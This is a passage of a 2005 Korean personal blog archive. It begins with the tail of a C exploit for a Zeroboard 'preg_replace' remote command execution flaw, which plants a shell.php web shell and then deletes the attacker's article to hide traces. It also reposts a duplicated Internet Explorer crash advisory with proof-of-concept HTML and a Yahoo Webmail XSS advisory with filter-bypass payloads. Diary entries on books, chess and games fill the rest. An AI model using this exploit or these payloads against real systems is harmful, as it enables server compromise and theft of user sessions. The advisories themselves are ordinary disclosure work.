memset(ReadBuf, 0, sizeof(ReadBuf));
FD_SET(sockfd, &fds);
if(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr("select", 1);
if(FD_ISSET(sockfd, &fds)){
if(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr("read", 1);
if(strstr(ReadBuf, "HTTP/1.1 ")){
if(strstr(ReadBuf,"Connection: close
")) reconn = 1;
if(strstr(ReadBuf+9, "200 OK
")) {
fprintf(stdout," - http://%s/%s/data/%s/shell.php is generated!
[+] Exploiting success!!
", zb_host, zb_dir, zb_tid);
fflush(stdout);
return;
}
else if(strstr(ReadBuf+9, "404 Not Found
")){
OutputErr(" - page not found
- 'mv' instruction permission denied.
- zeroboard was patched.
"
" [-] Exploit failed!
", 0);
}
else if(strstr(ReadBuf+9, "400 Bad Request
")){
OutputErr(" - Bad Request
"
" [-] Exploit failed!
", 0);
}
else {
OutputErr(ReadBuf, 0);
}
}
}
}
fprintf(stderr," error!
");
}
void DeleteArticle(void)
{
fd_set fds;
struct timeval tv;
char post_data[BUFSIZ];
if(reconn == 1) ConnectZboard(zb_host, zb_port);
sprintf(post_data,
"page=1&id=%s&no=%s&select_arrange=headnum&desc=asc&page_num=20&keyword=&
category=&sn=off&ss=off&sc=on&mode=&c_no=&password=1212&x=20&y=9
", zb_tid, no);
memset(WriteBuf, 0, sizeof(WriteBuf));
sprintf(WriteBuf,
"POST /%s/delete_ok.php HTTP/1.1
"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
"
"Referer: http://%s/%s/delete.php?id=%s&page=1&sn1=&divpage=1&
sn=off&ss=off&sc=on&select_arrange=headnum&desc=asc&no=%s
"
"Content-Type: application/x-www-form-urlencoded
"
"Accept-Encoding: gzip, deflate
"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
"
"Host: %s
"
"Content-Length: %d
"
"Connection: close
"
"Cache-Control: no-cache
"
"
"
"%s", zb_dir, zb_host, zb_dir, zb_tid, no, zb_host, strlen(post_data), post_data);
fprintf(stdout, " [*] Remove your article ");
fflush(stdout);
if(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr("write", 1);
tv.tv_sec = 60;
tv.tv_usec = 0;
FD_ZERO(&fds);
for(;;){
memset(ReadBuf, 0, sizeof(ReadBuf));
FD_SET(sockfd, &fds);
if(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr("select", 1);
if(FD_ISSET(sockfd, &fds)){
if(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr("read", 1);
if(strstr(ReadBuf, "HTTP/1.1 ")){
if(strstr(ReadBuf+9, "200 OK
")) {
if(strstr(ReadBuf+17, "<meta http-equiv="refresh" content="0; url=zboard.php?id=")) {
fprintf(stdout, " - ok! :)
");
fflush(stdout);
return;
}
else{
break;
}
}
else if(strstr(ReadBuf+9, "404 Not Found
")){
OutputErr(" - failed!(page not found)
", 0);
}
else if(strstr(ReadBuf+9, "400 Bad Request
")){
OutputErr(" - failed!(Bad Request)
", 0);
}
else {
fprintf(stderr,"%s", ReadBuf);
exit(1);
}
}
}
}
fprintf(stderr," error!
");
}
void StatusProcess(void)
{
putchar('.');
fflush(stdout);
}
void OutputErr(char *msg, int type)
{
if(!type){
fprintf(stderr,"%s", msg);
fflush(stderr);
}
else if(type==1){
if(!strcmp(msg, zb_host)) herror(msg);
else perror(msg);
}
DeleteArticle();
exit(1);
}
void Usage(char *arg)
{
fprintf(stderr,"[*] Zeroboard preg_replace() vulnerability Remote nobody exploit by n0gada
");
fprintf(stderr,"--------------------------------------------------------------------------
");
fprintf(stderr,"Usage: %s <SERVER> [PORT - default : 80]
", arg);
fprintf(stderr,"--------------------------------------------------------------------------
");
exit(1);
}
'Hobby > Computer' 카테고리의 다른 글
PHP memory_limit Exploit Code (0) | 2005.11.15 |
---|---|
Server Push (0) | 2005.11.15 |
Internet Explorer 'mshtmled.dll' 6.0 Denial Of Service (0) | 2005.11.15 |
Yahoo Webmail Vulnerabilty (0) | 2005.11.15 |
사이버독도사건 (1) | 2005.10.28 |
2005. 11. 15. 09:29
Internet Explorer 'mshtmled.dll' 6.0 Denial Of Service
A denial of service vulnerability exists within Internet Explorer 6.0 on XP SP2 with the J2SE Runtime Environment installed allows for an attacker to cause the browser to stop responding. Please read more for the full details.
digg it!
Internet Explorer 'mshtmled.dll' 6.0 Denial Of Service
Release Date:
October 24, 2005
Date Reported:
August 14, 2005
Severity:
Medium
Vendor:
Microsoft
Versions Affected:
Internet Explorer 6.0 on Windows XP SP2
Overview:
A denial of service vulnerability exists within Internet Explorer 6.0 on XP SP2 with the J2SE Runtime Environment installed allows for an attacker to cause the browser to stop responding.
Technical Details:
The flaw is within mshtmled.dll (6.00.2900.2753 (xpsp_sp2_gdr.050902-1326) and prior versions) which Internet Explorer 6.0 uses for HTML editing. Below is a snippet from mshtmled.dll which is causing the problem. From what is looks like, this is just a null pointer issue.
.text:76235680 loc_76235680: ; CODE XREF: sub_762355EC+56 j
.text:76235680 ; sub_762355EC+62 j ...
.text:76235680 mov eax, [esi+8]
.text:76235683 lea ecx, [eax+10h]
.text:76235686 mov eax, [ecx] ; <(=--- oops
.text:76235688 call dword ptr [eax+0Ch]
.text:7623568B mov ecx, [eax]
The following code below will reproduce this issue. Please note that you must have J2SE Runtime Environment installed which is located here:
http://www.java.com/en/download/windows_automatic.jsp
<'FRAMESET >
<'FRAME SRC=AAAA >
<'EMBED NAME=SP STYLE= >
<'APPLET HSPACE=file://AAAA >
Obviously just remove the '.
Vendor Status:
Ask Microsoft.
Discovered by:
Tom Ferris
Related Links:
http://www.security-protocols.com/poc/sp-x20.html
http://www.security-protocols.com/advisory/sp-x20-advisory.txt
http://www.evolvesecurity.com
A denial of service vulnerability exists within Internet Explorer 6.0 on XP SP2 with the J2SE Runtime Environment installed allows for an attacker to cause the browser to stop responding. Please read more for the full details.
digg it!
Internet Explorer 'mshtmled.dll' 6.0 Denial Of Service
Release Date:
October 24, 2005
Date Reported:
August 14, 2005
Severity:
Medium
Vendor:
Microsoft
Versions Affected:
Internet Explorer 6.0 on Windows XP SP2
Overview:
A denial of service vulnerability exists within Internet Explorer 6.0 on XP SP2 with the J2SE Runtime Environment installed allows for an attacker to cause the browser to stop responding.
Technical Details:
The flaw is within mshtmled.dll (6.00.2900.2753 (xpsp_sp2_gdr.050902-1326) and prior versions) which Internet Explorer 6.0 uses for HTML editing. Below is a snippet from mshtmled.dll which is causing the problem. From what is looks like, this is just a null pointer issue.
.text:76235680 loc_76235680: ; CODE XREF: sub_762355EC+56 j
.text:76235680 ; sub_762355EC+62 j ...
.text:76235680 mov eax, [esi+8]
.text:76235683 lea ecx, [eax+10h]
.text:76235686 mov eax, [ecx] ; <(=--- oops
.text:76235688 call dword ptr [eax+0Ch]
.text:7623568B mov ecx, [eax]
The following code below will reproduce this issue. Please note that you must have J2SE Runtime Environment installed which is located here:
http://www.java.com/en/download/windows_automatic.jsp
<'FRAMESET >
<'FRAME SRC=AAAA >
<'EMBED NAME=SP STYLE= >
<'APPLET HSPACE=file://AAAA >
Obviously just remove the '.
Vendor Status:
Ask Microsoft.
Discovered by:
Tom Ferris
Related Links:
http://www.security-protocols.com/poc/sp-x20.html
http://www.security-protocols.com/advisory/sp-x20-advisory.txt
http://www.evolvesecurity.com
'Hobby > Computer' 카테고리의 다른 글
Server Push (0) | 2005.11.15 |
---|---|
Zeroboard 4.x "preg_replace" Remote Command Execution Exploit (2) | 2005.11.15 |
Yahoo Webmail Vulnerabilty (0) | 2005.11.15 |
사이버독도사건 (1) | 2005.10.28 |
W.S. #00 (0) | 2005.10.27 |
2005. 11. 15. 09:22
SEC-CONSULT Security Advisory 20051021-0
=========================================
title: Yahoo/MSIE XSS
program: Yahoo Webmail in combination with MSIE 6.0
(maybe other browsers)
homepage: www.yahoo.com
found: 2005-04
by: SEC-Team / SEC-CONSULT / www.sec-consult.com
=========================================
Vulnerabilty overview:
---------------
Since april 2005 SEC-Consult has found 5+ serious vulnerabilities within Yahoo's webmail systems.
All of them have been fixed in the production environment. Nevertheless SEC-Consult believes that
input-validation thru blacklists can just be a temporary solution to problems like this. From our
point of view there are many other applications vulnerable to this special type of problem where
vulnerabilities of clients and servers can be combined.
Vulnerabilty details:
---------------
1) XSS / Cookie-Theft
Yahoos blacklists fail to detect script-tags in combination with special characters like NULL-Bytes and other META-Characters.
This leaves Webmail users using MSIE vulnerable to typical XSS / Relogin-trojan / Phishing attacks.
2) Some XSS Examples from our advisories
Excerpt from HTML-mails:
=========================================
SCRIPT-TAG:
---cut here---
<h1>hello</h1><s[META-Char]cript>alert("i have you now")</s[META-Char]cript></br>rrrrrrxxxxx<br>
---cut here---
=========================================
OBJECT-TAG:
---cut here---
<objec[META-Char]t classid="CLSID:D27CDB6E-AE6D-11cf-96B8-444553540000">
<param name="movie" value="http://[somewhere]/yahoo.swf"></obje[META-Char]ct>
---cut here---
=========================================
ONERROR-Attribute:
---cut here---
<img src="http://dontexist.info/x.jpg" one[META-Char]rror="alert('i have you now')">uargg</p>
---cut here---
=========================================
ONUNLOAD-Attribute:
---cut here---
</body><body onun[META-Char]load=alert('i have you now')><br></br><p>somewords</p></body></html>
---cut here---
=========================================
Recommended hotfixes for webmail-users
---------------
Do not use MS Internet-Explorer.
Recommended fixes
---------------
Do not use blacklists on tags and attributes. Whitelist special/meta-characters.
Vendor status:
---------------
Vulnerabilities have been fixed.
General remarks
---------------
We would like to apologize in advance for potential nonconformities and/or known issues.
~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC-Team / www.sec-consult.com /
'Hobby > Computer' 카테고리의 다른 글
Zeroboard 4.x "preg_replace" Remote Command Execution Exploit (2) | 2005.11.15 |
---|---|
Internet Explorer 'mshtmled.dll' 6.0 Denial Of Service (0) | 2005.11.15 |
사이버독도사건 (1) | 2005.10.28 |
W.S. #00 (0) | 2005.10.27 |
Character Recognition (0) | 2005.08.17 |
2005. 11. 14. 23:03
11월 중순.. '-'
오늘은 누군가의 생일이고, // 종훈이형 생일 추카해^^//
또 누군가에게는 최악의 날이였겠지..
나에겐 그냥 평범했지만 그닥 좋지는 않은 하루였었다
한시간 남짓 남은 오늘이 아쉬웠던가보다
들어 가서 쉬라는 누군가의 조언도..
힘들어하는 나의 몸뚱아리도 신경을 쓰지않고 버티고있다
아마도 수다.. 수다를 너무 떨고 싶은 것일까
쫓기는듯한 기분이 든다.. 뭔가 하지 않으면 그냥 멈춰버릴꺼 같은 기분...
할수가 없다 아무것도... 그래서 이글을 쓰는 수밖에 없다 아마도..
지나가면서 이런 저런 생각을 한다.
그리고 가끔씩은 정말로 너무 쓰고싶었던 생각들이 정리가된다..
하지만 그게 무엇이였는지도 기억이 나질 않는다..
건망증.. 나의 한계는 그정도.. 수첩이 필요할듯 싶다.
그럴싸하게 뭔가 지어낸 대사 몇마디조차 기억 나질않아서..
개성도 없고 감정만 앞선 글을 적어나간다
아니, 생각의 토막을 그냥 옮겨놓을 뿐이지..
문학. 요새 재미가 붙어버린 퀘스트
한동안 많이 멀어졌었지.. 나의 관심은 다른곳에 있었으니까
대학 2년 동안 적어도 200권이 넘는 책을 접했다
그중 문학이란건 두세권이 될려나 모를정도라면?
그렇다 그정도로 나는 미쳐있었다 -_-
요새는 반대로 그 미쳤던 책들을 읽은 기억이없다.
난 TCP/IP의 개념을 파악하는 대신에 '파트리트 쥐스킨트' 라는 사람을 알게 되었고..
그사람의 깊이는 내가 좋아할만한 것이란 것도 알게되었다 // 포우 만큼은 아니였지만
주변이 농담하듯 말하는 나의 음침함-나는 이것을 슬픔이라고 칭하고있다-하고 맞는다
내가 느끼는 '깊이'라는건 슬픔이거나 공포 정도의 감정. (혹은 자존심 관련)
오늘은 누군가의 생일이고, // 종훈이형 생일 추카해^^//
또 누군가에게는 최악의 날이였겠지..
나에겐 그냥 평범했지만 그닥 좋지는 않은 하루였었다
한시간 남짓 남은 오늘이 아쉬웠던가보다
들어 가서 쉬라는 누군가의 조언도..
힘들어하는 나의 몸뚱아리도 신경을 쓰지않고 버티고있다
아마도 수다.. 수다를 너무 떨고 싶은 것일까
쫓기는듯한 기분이 든다.. 뭔가 하지 않으면 그냥 멈춰버릴꺼 같은 기분...
할수가 없다 아무것도... 그래서 이글을 쓰는 수밖에 없다 아마도..
지나가면서 이런 저런 생각을 한다.
그리고 가끔씩은 정말로 너무 쓰고싶었던 생각들이 정리가된다..
하지만 그게 무엇이였는지도 기억이 나질 않는다..
건망증.. 나의 한계는 그정도.. 수첩이 필요할듯 싶다.
그럴싸하게 뭔가 지어낸 대사 몇마디조차 기억 나질않아서..
개성도 없고 감정만 앞선 글을 적어나간다
아니, 생각의 토막을 그냥 옮겨놓을 뿐이지..
문학. 요새 재미가 붙어버린 퀘스트
한동안 많이 멀어졌었지.. 나의 관심은 다른곳에 있었으니까
대학 2년 동안 적어도 200권이 넘는 책을 접했다
그중 문학이란건 두세권이 될려나 모를정도라면?
그렇다 그정도로 나는 미쳐있었다 -_-
요새는 반대로 그 미쳤던 책들을 읽은 기억이없다.
난 TCP/IP의 개념을 파악하는 대신에 '파트리트 쥐스킨트' 라는 사람을 알게 되었고..
그사람의 깊이는 내가 좋아할만한 것이란 것도 알게되었다 // 포우 만큼은 아니였지만
주변이 농담하듯 말하는 나의 음침함-나는 이것을 슬픔이라고 칭하고있다-하고 맞는다
내가 느끼는 '깊이'라는건 슬픔이거나 공포 정도의 감정. (혹은 자존심 관련)
2005. 11. 14. 22:07
간만에 생각이나서..
봤다. 최종화까지..
숨막힘.. 반전의 연속...
캐츠비.. 어리버리한 내 감정 이입 대상...
페르수.. 백조를.. 어린 백조를 사랑한 여자...
슬픔.. 공포와 더불어서 내게 상당히 자극적인 감정...
감동.. 미칠것같음.. 더이상 표현할 단어가 생각나지 않는 상태...
봤다. 최종화까지..
숨막힘.. 반전의 연속...
캐츠비.. 어리버리한 내 감정 이입 대상...
페르수.. 백조를.. 어린 백조를 사랑한 여자...
슬픔.. 공포와 더불어서 내게 상당히 자극적인 감정...
감동.. 미칠것같음.. 더이상 표현할 단어가 생각나지 않는 상태...
'Privacy > Real' 카테고리의 다른 글
머그컵 (4) | 2005.11.17 |
---|---|
# - 2k05.11.14 (2) | 2005.11.14 |
azki's personality #11 (0) | 2005.11.14 |
Chess.. (1) | 2005.11.13 |
또다른 나의 발견 -_- (2) | 2005.11.07 |
2005. 11. 14. 19:57
마비노기도 인생과 다를바가 없는거같다
언젠간 죽을꺼다 적어도 내가 죽는 순간에
마비노기도 끝이 나겠지..
나름대로의 회의론자인 나는 생각을 한다
언젠간 끝이 나겠지.. 라고 -_-
그런데 무엇을 향해 가고 있나?
죽음을 향해가고 있는 인생도 마찬가지고..
아직까지는 답을 찾지 못했다..
나의 인생과 마찬가지로 아마 관두기 싫기 때문에 하는 것 같다
그럼 어째서일까.. 관두기 싫은 것은..?
부록: 마비노기 부스 in G★
'Hobby > Mabinogi' 카테고리의 다른 글
여자 검 정령 무기 먹거리 (3) | 2005.12.06 |
---|---|
마비노기 마우스 아이콘 (2) | 2005.11.22 |
그분... (2) | 2005.11.13 |
아 졸라게 잼겠다 -_- (4) | 2005.10.27 |
까마귀 -_-;; 아싸 이거사야지.. (2) | 2005.10.27 |
2005. 11. 14. 19:16
소심한녀석..
'Privacy > Real' 카테고리의 다른 글
# - 2k05.11.14 (2) | 2005.11.14 |
---|---|
위대한 캣츠비 (0) | 2005.11.14 |
Chess.. (1) | 2005.11.13 |
또다른 나의 발견 -_- (2) | 2005.11.07 |
벽 속에 3주 갇혀 있던 고양이 구출돼 (2) | 2005.11.02 |
2005. 11. 13. 12:33
어제 잠시 느꼈던 그분의 압박 -_-ㅋㅋ
간만에 느껴보는 것들은 나쁘지만은 않다. 그것이 나쁜 것일지라도 '-'
심각한 이야기를 이런 유쾌한 만화뒤에 다는 것은 나쁘기 때문에 그만 할련다..
데부켓 또 버그를 일으켜.. 프리미엄PC방 서비스 중단이 원인이였다-_-;;
한시간 반동안 가방도 못열고 라비랑 마스를 돌았다 -_-
오늘의 플레이 시간은 20분 남았습니다 메세지까지 보았었지만.. 서비스재개
어째뜬 결국에는 나오님에게 붙잡혀가진 못했었지만.. 뭔가 재미있었다-_-;;
'Hobby > Mabinogi' 카테고리의 다른 글
마비노기 마우스 아이콘 (2) | 2005.11.22 |
---|---|
목적? (6) | 2005.11.14 |
아 졸라게 잼겠다 -_- (4) | 2005.10.27 |
까마귀 -_-;; 아싸 이거사야지.. (2) | 2005.10.27 |
추억이란 이름의 페이지 #0 (2) | 2005.10.20 |
2005. 11. 13. 12:22
난 보드 게임을 좋아한다 정확히 말하자면 장기와 체스뿐이겠지만
그리고 승부라는 작품을 읽고 간만에 체스를 한번 두게 되었다..
결과는 3수만에 끝..
상대방 킹의 목을 졸랐던 것은 퀸이 아니다
자기편 폰들이였다..
그것은 작게 느껴지지만 정말 자신의 가장 소중한 것에 위협적이다
나는 무슨 실수를 범했으며, 그것이 어떠한 식으로 나에게 돌아 왔는지..
다시끔 생각 한다 최근에 겪은 후회하였던 일들을..
사소한 일 하나가 중요한 일을 망치는 것을 다시 느끼고 깨닫다..
하지만 결국에는 무엇이 무엇때문인지도 모른채 지나갈 뿐.
'Privacy > Real' 카테고리의 다른 글
위대한 캣츠비 (0) | 2005.11.14 |
---|---|
azki's personality #11 (0) | 2005.11.14 |
또다른 나의 발견 -_- (2) | 2005.11.07 |
벽 속에 3주 갇혀 있던 고양이 구출돼 (2) | 2005.11.02 |
몇일전 바비리맨 아저씨 (0) | 2005.10.27 |
2005. 11. 7. 23:25
오늘의 가장 멋진 수확:
http://blog.naver.com/azuki73
은근히 맘에 드는 또다른 나를 발견하였다.. -_-;;
http://blog.naver.com/azuki73
은근히 맘에 드는 또다른 나를 발견하였다.. -_-;;
'Privacy > Real' 카테고리의 다른 글
azki's personality #11 (0) | 2005.11.14 |
---|---|
Chess.. (1) | 2005.11.13 |
벽 속에 3주 갇혀 있던 고양이 구출돼 (2) | 2005.11.02 |
몇일전 바비리맨 아저씨 (0) | 2005.10.27 |
무언가 마법의 성 -_- (0) | 2005.10.27 |